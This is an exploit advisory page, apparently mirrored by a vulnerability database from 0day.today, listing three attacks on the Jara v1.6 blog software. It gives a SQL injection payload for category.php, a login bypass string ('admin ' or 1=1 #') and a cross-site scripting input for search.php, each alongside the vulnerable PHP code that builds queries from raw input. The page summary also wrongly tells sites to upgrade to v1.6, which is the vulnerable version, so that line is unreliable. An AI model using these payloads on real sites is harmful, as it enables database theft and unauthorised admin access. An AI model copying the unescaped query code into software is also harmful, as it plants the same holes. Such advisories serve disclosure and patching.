Lucene search
K

Jara v1.6 Multiple Vulnerabilities

🗓️ 02 Nov 2011 00:00:00Reported by Or4nG.M4NType 
zdt
 zdt
🔗 0day.today👁 23 Views

Jara v1.6 Multiple Vulnerabilities including SQL Injection, Auth Bypass, and Cross Site Scripting. Site should update to the latest version v1.6 to address these issues

Code
#!/Mohammed/bin/YahYa
# Jara v1.6 Multiple Vulnerabilities
# -------------------------------------------[+]
# download : http://sourceforge.net/projects/jara/files/v1.6/jarav16.zip
# AutHOr   : Or4nG.M4n
# cOntAct  :  priv8te[at]hotmail.com
# versiOn  : v1.6
# Tested   : My Mind (:
# -------------------------------------------[+]
#
[ Exploit ] Sql injection ~ ~
|=> /category.php?id=999999.9'[Here]
# Vulnerable code : category.php
#       @$categoryid = $_REQUEST["id"]; <= [1]
#       $category = jara_get_category($categoryid); <=[2]
#       jara_page_start("Category: ".$category["title"]); <=[3]
#       $query = "select * from jara_posts where categoryid = '$categoryid'"; <=[4]
#       $result = jara_db_query($query); <=[5]
#
[ Exploit ] Auth Bypass ~
|=> admin ' or 1=1 #
# Vulnerable code : auth_fns.php
#       function jara_user_authenticate($username, $password) { <=[1]
#       $query = "select * from jara_users where username = '$username' and password = SHA1('$password') limit 1"; <=[2]
#       $result = jara_db_query($query); <=[3]
#
[ Exploit ] Cross Site Scrpting ~
|=> POST : <h1>DDD<h1> => your xss Code
# Vulnerable code : search.php
#           $num_rows = $result->num_rows;
#           echo "<p><strong>$num_rows</strong> results for <strong>".stripslashes($term)."</strong>.</p>";
# ~ End
# -------------------------------------------[+]
#  Greet : sA^Dev!L , xSs m4n , Tryag Team
# Cyb3r-Crystal , Dr.Banned [Miss u] , i-hmx
# -------------------------------------------[+]



#  0day.today [2018-01-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation